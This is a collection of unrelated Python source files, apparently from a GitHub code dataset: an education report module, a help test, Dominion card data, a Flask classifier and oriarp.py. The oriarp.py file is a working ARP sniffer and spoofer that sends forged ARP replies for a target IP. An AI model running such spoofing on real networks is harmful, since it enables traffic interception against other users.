result)\n\n result['claims'] = get_claims(number_of_claims=5, result=result, include_names=True, include_scores=True, include_min_max_scores=True, include_indexer=True)\n result['accommodations'] = get_accommodations(result=result)\n\n new_results.append(result)\n\n # rearranging the json so we could use it more easily with mustache\n for idx, value in enumerate(new_results):\n new_results[idx] = __calculateClaimScoreRelativeDifference(value)\n return {\"all_results\": new_results}\n\n\ndef __arrange_results_iab(results, subjects_map, custom_metadata_map):\n '''\n This method arranges the data retrieved from the db to make it easier to consume by the client\n '''\n iab_results = {}\n if len(results) is 0:\n return iab_results\n first_result = results[0]\n iab_results['student_full_name'] = format_full_name(first_result['first_name'], first_result['middle_name'], first_result['last_name'])\n iab_results['first_name'] = first_result.get('first_name')\n iab_results['middle_name'] = first_result.get('middle_name')\n iab_results['last_name'] = first_result.get('last_name')\n iab_results['asmt_grade'] = first_result.get('asmt_grade')\n iab_results['asmt_type'] = capwords(first_result.get('asmt_type'), ' ')\n iab_results['asmt_period_year'] = first_result.get('asmt_period_year')\n iab_results['student_id'] = first_result.get('student_id')\n\n # Go through each of the different subjects ELA, Math etc.\n subject_data = {}\n for alias in subjects_map.values():\n subject_data[alias] = []\n # Check each DB result against the subject\n for result in results:\n subject_list = {}\n subject = result['asmt_subject']\n subject_list['claims'] = get_claims(number_of_claims=1, result=result, include_names=True, include_scores=False, include_min_max_scores=False, include_indexer=False, include_complete_admin_cond=True)\n subject_list['grade'] = result.get('asmt_grade')\n subject_list['date_taken'] = result.get('date_taken')\n subject_data[subjects_map.get(subject)].append(subject_list)\n # Create map from subject to all value for it's type\n for k, v in subject_data.items():\n iab_results[k] = v\n return {\"all_results\": iab_results}\n\n\n@report_config(name=REPORT_NAME,\n params={\n Constants.STATECODE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z]{2}$\"},\n Constants.STUDENTGUID: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASSESSMENTGUID: {\n \"type\": \"string\",\n \"required\": False,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASMTYEAR: {\n \"type\": \"integer\",\n \"required\": True,\n \"pattern\": \"^[1-9][0-9]{3}$\"},\n Constants.DATETAKEN: {\n \"type\": \"integer\",\n \"required\": False,\n \"pattern\": \"^[1-9]{8}$\"},\n Constants.ASMTTYPE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^(\" + AssessmentType.INTERIM_ASSESSMENT_BLOCKS + \"|\" + AssessmentType.SUMMATIVE + \"|\" + AssessmentType.INTERIM_COMPREHENSIVE + \")$\"}\n })\n@validate_user_tenant\n@user_info\n@get_current_request_context\n@audit_event()\ndef get_student_report(params):\n '''\n Individual Student Report\n '''\n student_id = params[Constants.STUDENTGUID]\n state_code = params[Constants.STATECODE]\n academic_year = params.get(Constants.ASMTYEAR)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_type = asmt_type if asmt_type and asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS else None\n\n with EdCoreDBConnection(state_code=state_code) as connection:\n # choose query IAB or other assessment\n query_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __prepare_query_iab, None: __prepare_query}\n # choose arrange results for the client IAB or other assessment\n arrange_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __arrange_results_iab, None: __arrange_results}\n query = query_function[asmt_type](connection, params)\n result = connection.get_result(query)\n if not result:\n logger.error(\"Individual student report: there are no results for student id : %s\", student_id)\n raise NotFoundException(\"There are no results for student id {0}\".format(student_id))\n records = [record for record in result if record['asmt_period_year'] == academic_year]\n first_student = records[0] if len(records) > 0 else result[0]\n state_code = first_student[Constants.STATE_CODE]\n district_id = first_student[Constants.DISTRICT_ID]\n school_id = first_student[Constants.SCHOOL_ID]\n asmt_grade = first_student['asmt_grade']\n student_name = format_full_name(first_student['first_name'], first_student['middle_name'], first_student['last_name'])\n context = get_breadcrumbs_context(state_code=state_code, district_id=district_id, school_id=school_id, asmt_grade=asmt_grade, student_name=student_name)\n student_report_asmt_administration = get_asmt_administration_years_isr(state_code, student_ids=student_id)\n\n # color metadata\n custom_metadata_map = get_custom_metadata(result[0].get(Constants.STATE_CODE), None)\n # subjects map\n subjects_map = get_subjects_map()\n result = arrange_function[asmt_type](result, subjects_map, custom_metadata_map)\n\n result['context'] = context\n result[Constants.METADATA] = {Constants.BRANDING: custom_metadata_map.get(Constants.BRANDING)}\n result[Constants.SUBJECTS] = {v: k for k, v in subjects_map.items()}\n result['asmt_administration'] = student_report_asmt_administration\n return result\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter/smarter/reports/student_report.py","file_name":"student_report.py","file_ext":"py","file_size_in_byte":24626,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"39221250381","text":"import unittest\n\nfrom test.stub_stdout import StubStdout\n\nfrom googkit.commands.command import Command\nfrom googkit.compat.unittest import mock\nfrom googkit.lib.argument import ArgumentParser\nfrom googkit.lib.command_tree import CommandTree\nfrom googkit.lib.help import Help\n\n\nclass TestHelp(unittest.TestCase):\n class OptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set(['--foo', '--bar'])\n\n class NoOptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set()\n\n def setUp(self):\n CommandTree.DEFAULT_TREE = {\n '0_leaf': TestHelp.NoOptionCommand,\n '0_node': {\n '1_leaf': TestHelp.OptionCommand,\n '1_node': {\n '2_leaf': mock.MagicMock()\n }\n }\n }\n self.tree = CommandTree()\n\n def help_with_args(self, args):\n arg = ArgumentParser.parse(['googkit.py'] + args)\n return Help(self.tree, arg)\n\n def test_is_valid_commands(self):\n help = self.help_with_args(['0_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf', 'bluerose'])\n self.assertFalse(help._is_valid_commands())\n\n def test_print_usage(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n def test_print_available_commands(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_commands(None)\n self.assertFalse(mock_stdout.write.called)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Available commands') >= 0)\n\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Did you mean one of these') >= 0)\n\n def test_similarity(self):\n func = Help.similarity('desp')\n self.assertTrue(func('deps') >= func('build'))\n self.assertTrue(func('') == 0)\n\n def test_candidates(self):\n available_commands = ['build', 'compile', 'deps', 'init', 'lint', 'setup']\n result = Help.candidates(available_commands, 'desp')\n self.assertEqual(result[0], 'deps')\n result = Help.candidates(available_commands, 'int')\n self.assertTrue('init' in result)\n self.assertTrue('lint' in result)\n\n def test_print_available_options(self):\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Non-existent command should not print availabe options')\n\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Command that has no supported options should not print available options')\n\n help = self.help_with_args(['0_node', '1_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_options()\n self.assertTrue(\n mock_stdout.getvalue().find('Available options') >= 0,\n 'Command that has supported options should print available options')\n\n def test_print_help(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertFalse(mock_stdout.getvalue().find('Invalid command') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertTrue(mock_stdout.getvalue().find('Invalid command') >= 0)\n","repo_name":"googkit/googkit","sub_path":"test/lib/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"}
+{"seq_id":"32687369500","text":"#!/usr/bin/python3\r\nimport socket\r\nimport struct\r\nimport uuid\r\nimport sys\r\nimport os\r\nimport binascii\r\n\r\n\r\ndef getsocketinformation():\r\n #create socket and receive all type of packets\r\n a_scoket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\r\n\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\r\n a_scoket.bind((os.listdir('/sys/class/net/')[1], 0))\r\n\r\n return a_scoket\r\n\r\ndef getmac():\r\n List = []\r\n Mymac = uuid.getnode()\r\n count = 0\r\n while(count < 6):\r\n List = [Mymac % 0x100] + List\r\n Mymac //= 0x100\r\n count += 1\r\n return List\r\n\r\ndef getpacketinformation():\r\n arpin = {\r\n 'my_mac' : struct.pack('!6B',*getmac()),\r\n 'my_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_type' : struct.pack('!H', 0x0806)\r\n }\r\n packet = {\r\n\r\n #header\r\n 'target_mac_addr' : struct.pack('!6B',0xFF,0xFF,0xFF,0xFF,0xFF,0xFF),\r\n 'source_mac_addr' : struct.pack('!6B',*getmac()),\r\n 'frame_type' : struct.pack('!H',0x0806),\r\n\r\n #arp body\r\n 'arp_body_hw_type' : struct.pack('!H', 0x0001),\r\n 'arp_body_protocal_type' : struct.pack('!H', 0x0800),\r\n 'arp_body_hw_length' : struct.pack('!B', 0x06),\r\n 'arp_body_protocal_length' : struct.pack('!B', 0x04),\r\n 'arp_body_opcode' : struct.pack('!H', 0x0001),\r\n 'arp_body_source_mac' : struct.pack('!6B',*getmac()),\r\n 'arp_body_source_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_body_target_mac' : struct.pack('!6B',0,0,0,0,0,0),\r\n 'arp_body_target_ip' : ''\r\n }\r\n return packet\r\n\r\ndef receive(my_socket):\r\n my_packet = getpacketinformation()\r\n\r\n frame = my_socket.recvfrom(2048)\r\n header = frame[0][0:14]\r\n arp_body = frame[0][14:42]\r\n\r\n header_temp = struct.unpack(\"!6s6s2s\", header)\r\n arp_body_temp = struct.unpack(\"!2s2s1s1s2s6s4s6s4s\", arp_body)\r\n\r\n my_packet['target_mac_addr'] = binascii.hexlify(header_temp[0],':')\r\n my_packet['source_mac_addr'] = binascii.hexlify(header_temp[1],':')\r\n my_packet['frame_type'] = header_temp[2]\r\n\r\n my_packet['arp_body_opcode'] = arp_body_temp[4]\r\n my_packet['arp_body_source_mac'] = binascii.hexlify(arp_body_temp[5],':')\r\n my_packet['arp_body_source_ip'] = socket.inet_ntoa(arp_body_temp[6])\r\n my_packet['arp_body_target_mac'] = binascii.hexlify(arp_body_temp[7],':')\r\n my_packet['arp_body_target_ip'] = socket.inet_ntoa(arp_body_temp[8])\r\n\r\n return my_packet\r\n\r\ndef listening():\r\n print(\"### ARP sniffer mode ###\")\r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef Listening(ip):\r\n print(\"### ARP sniffer mode ###\")\r\n \r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n #print(_Packet['arp_body_target_ip'])\r\n #receive target or source is \"ip\" only\r\n if _Packet['arp_body_target_ip'] != ip and _Packet['arp_body_source_ip'] != ip:\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef question(ip):\r\n Arp_packet = getpacketinformation()\r\n Arp_socket = getsocketinformation()\r\n\r\n Arp_packet['arp_body_target_ip'] = socket.inet_aton(ip)\r\n\r\n Arp_packet_list = [ i for i in Arp_packet.values() ]\r\n \r\n\r\n\r\n Arp_packet['arp_body_source_ip'] = socket.inet_ntoa(Arp_packet['arp_body_source_ip'])\r\n Arp_packet['arp_body_target_ip'] = socket.inet_ntoa(Arp_packet['arp_body_target_ip'])\r\n\r\n\r\n\r\n Arp_socket.send(b''.join(Arp_packet_list))\r\n \r\n print(\"Get ARP packet - Who has \" + Arp_packet['arp_body_target_ip'] + \" ? Tell \" + Arp_packet['arp_body_source_ip'])\r\n\r\n while True:\r\n Arp_responce = receive(Arp_socket)\r\n\r\n if Arp_responce['frame_type'] != b'\\x08\\x06':\r\n continue\r\n \r\n\r\n if Arp_responce['arp_body_source_ip'] == ip:\r\n print(\"MAC address of \" + Arp_responce['arp_body_source_ip'] + \" is \" + bytes.decode(Arp_responce['arp_body_source_mac']))\r\n break\r\n\r\ndef Spoof(fack_mac , target_ip):\r\n a_scoket = getsocketinformation()\r\n\r\n fack_mac = str.encode(fack_mac)\r\n fack_mac = binascii.unhexlify(fack_mac.replace(b':', b''))\r\n while True:\r\n Arp_request = receive(a_scoket)\r\n\r\n if Arp_request['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if Arp_request['arp_body_opcode'] != b'\\x00\\x01' or Arp_request['arp_body_target_ip'] != target_ip:\r\n continue\r\n print(\"arp request\")\r\n \r\n print(\"Arp request target ip is \" + Arp_request['arp_body_target_ip'])\r\n\r\n print(\"fack arp responce :\")\r\n\r\n fack_arp_responce = getpacketinformation()\r\n \r\n Arp_request['arp_body_source_mac'] = bytes.decode(Arp_request['arp_body_source_mac'])\r\n Arp_request['arp_body_source_mac'] = Arp_request['arp_body_source_mac'].replace(':','')\r\n\r\n fack_arp_responce['target_mac_addr'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n fack_arp_responce['source_mac_addr'] = fack_mac\r\n fack_arp_responce['arp_body_opcode'] = struct.pack('!H', 0x0002)\r\n fack_arp_responce['arp_body_source_mac'] = fack_mac\r\n fack_arp_responce['arp_body_target_ip'] = socket.inet_aton(Arp_request['arp_body_source_ip'])\r\n fack_arp_responce['arp_body_source_ip'] = socket.inet_aton(target_ip)\r\n fack_arp_responce['arp_body_target_mac'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n \r\n \r\n fack_arp_responce_list = [ k for k in fack_arp_responce.values() ]\r\n\r\n a_scoket.send(b''.join(fack_arp_responce_list))\r\n print(\"Send successfull.\")\r\n exit()\r\n\r\n\r\n\r\ndef main(run):\r\n if os.geteuid() != 0:\r\n print(\"ERROR: You must be root to use the tool!\")\r\n exit()\r\n\r\n print(\"[ ARP sniffer and spoof program ]\")\r\n\r\n if run[0] == '-help':\r\n print(\"Format :\")\r\n print(\"1) sudo python3 arp.py -l -a\")\r\n print(\"2) sudo python3 arp.py -l \")\r\n print(\"3) sudo python3 -q \")\r\n print(\"4) sudo python3 \")\r\n\r\n elif run == ['-l','-a']:\r\n listening()\r\n\r\n elif run[0] == '-l':\r\n Listening(run[1])\r\n\r\n elif run[0] == '-q':\r\n question(run[1])\r\n\r\n else:\r\n Spoof(run[0],run[1])\r\n \r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv[1:])\r\n\r\n\"\"\"\r\ndef a(n):\r\n code\r\n\r\nb = 10\r\na(b)\r\n\"\"\"\r\n","repo_name":"EnNoYa/EnNoYa.github.io","sub_path":"oriarp.py","file_name":"oriarp.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31807228437","text":"cards = {\n 'adventurer' : {\n 'name':'Adventurer',\n 'set':'Base',\n 'cost':6,\n 'type':'Action',\n 'effects': {\n 'other':'Reveal cards from your deck until you reveal 2 Treasure cards. Put those treasure cards into your hand and discard the other revealed cards'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/adventurer.jpg'\n },\n 'bureaucrat' : {\n 'name':'Bureaucrat',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'other':'Gain a Silver card; put it on top of your deck. Each other player reveals a Victory card from their hand and puts it on their deck (or reveals a hand with no Victory cards).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/bureaucrat.jpg'\n },\n 'cellar' : {\n 'name':'Cellar',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'actions':1,\n 'other':'Discard any number of cards. +1 Card per card discarded.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/cellar.jpg'\n },\n 'chancellor' : {\n 'name':'Chancellor',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'coins':2,\n 'other':'You may immediately put your deck into your discard pile.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chancellor.jpg'\n },\n 'chapel' : {\n 'name':'Chapel',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'other':'Trash up to 4 cards from your hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chapel.jpg'\n },\n 'council_room' : {\n 'name':'Council Room',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':4,\n 'buys':1,\n 'other':'Each other player draws a card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/councilroom.jpg'\n },\n 'feast' : {\n 'name':'Feast',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Trash this card. Gain a card costing up to 5.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/feast.jpg'\n },\n 'festival' : {\n 'name':'Festival',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'actions':2,\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/festival.jpg'\n },\n 'gardens' : {\n 'name':'Gardens',\n 'set':'Base',\n 'cost':4,\n 'type':'Victory',\n 'effects': {\n 'other':'Worth 1 Victory Point for every 10 cards in your desk (rounded down).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/gardens.jpg'\n },\n 'laboratory' : {\n 'name':'Laboratory',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':2,\n 'actions':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/laboratory.jpg'\n },\n 'library' : {\n 'name':'Library',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Draw until you have 7 cards in hand. You may set aside any Action cards drawn this way, as you draw them; discard the set aside cards after you finish drawing.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/library.jpg'\n },\n 'market' : {\n 'name':'Market',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':1,\n 'buys':1,\n 'coins':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/market.jpg'\n },\n 'militia' : {\n 'name':'Militia',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'coins':2,\n 'other':'Each other player discards down to 3 cards in their hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/militia.jpg'\n },\n 'mine' : {\n 'name':'Mine',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Trash a Treasure card from your hand. Gain a Treasure card costing up to 3 more; put it into your hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/mine.jpg'\n },\n 'moat' : {\n 'name':'Moat',\n 'set':'Base',\n 'cost':2,\n 'type':'Action - Reaction',\n 'effects': {\n 'cards':2,\n 'other':'When another player plays an Attack card, you may reveal this from your hand. If you do so, you are unaffected by that Attack.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moat.jpg'\n },\n 'moneylender' : {\n 'name':'Moneylender',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Trash a Copper card from your hand. If you do, +3 treasures.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moneylender.jpg'\n },\n 'remodel' : {\n 'name':'Remodel',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'efftecs': {\n 'other':'Trash a card from your hand. Gain a card costing up to 2 more than the trashed card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/remodel.jpg'\n },\n 'smithy' : {\n 'name':'Smithy',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'cards':3\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/smithy.jpg'\n },\n 'spy' : {\n 'name':'Spy',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'cards':1,\n 'actions':1,\n 'other':'Each player (including you) reveals the top card of their deck and either discards it or puts it back, your choice.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/spy.jpg'\n },\n 'thief' : {\n 'name':'Thief',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'other':'Each other player reveals the top 2 cards of their deck. If they revealed any Treasure cards, they trash one of them that you choose. You may gain any or all of these trashed cards. They discard the other revealed cards.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/thief.jpg'\n },\n 'throne_room' : {\n 'name':'Throne Room',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Choose an Action card in your hand. Play it twice.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/throneroom.jpg'\n },\n 'village' : {\n 'name':'Village',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/village.jpg'\n },\n 'witch' : {\n 'name':'Witch',\n 'set':'Base',\n 'cost':5,\n 'type':'Action - Attack',\n 'effects': {\n 'cards':2,\n 'other':'Each other player gains a Curse card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/witch.jpg'\n },\n 'woodcutter' : {\n 'name':'Woodcutter',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/woodcutter.jpg'\n },\n 'workshop' : {\n 'name':'Workshop',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'other':'Gain a card costing up to 4 treasures.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/workshop.jpg'\n },\n 'copper' : {\n 'name':'Copper',\n 'set':'Base',\n 'cost':0,\n 'type':'Treasure',\n 'effects': {\n 'coins':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/copper.jpg'\n },\n 'silver' : {\n 'name':'Silver',\n 'set':'Base',\n 'cost':3,\n 'type':'Treasure',\n 'effects': {\n 'coins':2\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/silver.jpg'\n },\n 'gold' : {\n 'name':'Gold',\n 'set':'Base',\n 'cost':6,\n 'type':'Treasure',\n 'effects': {\n 'coins':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/gold.jpg'\n },\n 'estate' : {\n 'name':'Estate',\n 'set':'Base',\n 'cost':2,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/estate.jpg'\n },\n 'duchy' : {\n 'name':'Duchy',\n 'set':'Base',\n 'cost':5,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/duchy.jpg'\n },\n 'province' : {\n 'name':'Province',\n 'set':'Base',\n 'cost':8,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':6\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/province.jpg'\n },\n 'curse' : {\n 'name':'Curse',\n 'set':'Base',\n 'type':'Curse',\n 'effects': {\n 'victorypoints':-1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/curse.jpg'\n },\n}\n\ndecks = {\n 'first-game' : [\n 'cellar',\n 'market',\n 'militia',\n 'mine',\n 'moat',\n 'remodel',\n 'smithy',\n 'village',\n 'woodcutter',\n 'workshop',\n ],\n 'big-money' : [\n 'adventurer',\n 'bureaucrat',\n 'chancellor',\n 'chapel',\n 'feast',\n 'laboratory',\n 'market',\n 'mine',\n 'moneylender',\n 'throne_room',\n ],\n 'interaction' : [\n 'bureaucrat',\n 'chancellor',\n 'council_room',\n 'festival',\n 'library',\n 'militia',\n 'moat',\n 'spy',\n 'thief',\n 'village',\n ],\n 'size-distortion' : [\n 'cellar',\n 'chapel',\n 'feast',\n 'gardens',\n 'laboratory',\n 'thief',\n 'village',\n 'witch',\n 'woodcutter',\n 'workshop',\n ],\n 'village-square' : [\n 'bureaucrat',\n 'cellar',\n 'festival',\n 'library',\n 'market',\n 'remodel',\n 'smithy',\n 'throne_room',\n 'village',\n 'woodcutter',\n ],\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aaron-zeisler/dominion","sub_path":"dominion/dominion_data.py","file_name":"dominion_data.py","file_ext":"py","file_size_in_byte":12016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"16851974383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 2 18:15:39 2019\n\n@author: Mr Mejia\n\"\"\"\n\nfrom flask import Flask, jsonify\nfrom sklearn.externals import joblib\nfrom iswai.sensor_mongodb import SensorMongoDB\n\napp = Flask(__name__)\n\n@app.route('/classify//')\ndef classify(hm, tm):\n \n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n # Make predictions on request data\n data = [hm, tm]\n predictions = model.predict([data])\n \n # return the classification in JSON format\n return jsonify({'clima':predictions[0]})\n\n@app.route('/classify', methods=['POST'])\ndef classify_json():\n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n content = request.get_json()\n \n data = []\n for row in content:\n tm = row['tm']\n hm = row['hm']\n item = [tm, hm]\n data.append(item)\n \n # Make Predictions\n predictions = model.predict(data)\n \n # Return the classification in JSON format\n return jsonify(clima=predictions[0])\n\n\n@app.route('/list', methods=['GET'])\ndef list():\n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n sensor_mongodb = SensorMongoDB()\n dataframe = sensor_mongodb.getDataframe()\n print(dataframe)\n \n json_data = []\n \n for index, row in dataframe.iterrows():\n tm = row['temperatura']\n hm = row['humedad']\n item = [tm, hm]\n \n category = model.predict([item])[0]\n json_item = {'tm':tm, 'hm':hm, 'clima':category}\n json_data.append(json_item)\n \n return jsonify(Tiempo=json_data)\n\nif __name__ == '__main__':\n app.run()","repo_name":"DuvanSGF/Sifunciona","sub_path":"DataScienceII/ClasesGithub/Nueva carpeta/sensor/iswai/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"12657131896","text":"x=int(input())\nflag=True\ncnt=0\nwhile flag:\n for i in range(2,int(x**0.5)):\n if x%i!=0:\n continue\n cnt=1\n break\n if cnt==0:\n print(x)\n exit()\n cnt=0\n x+=1","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc149/abc149_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
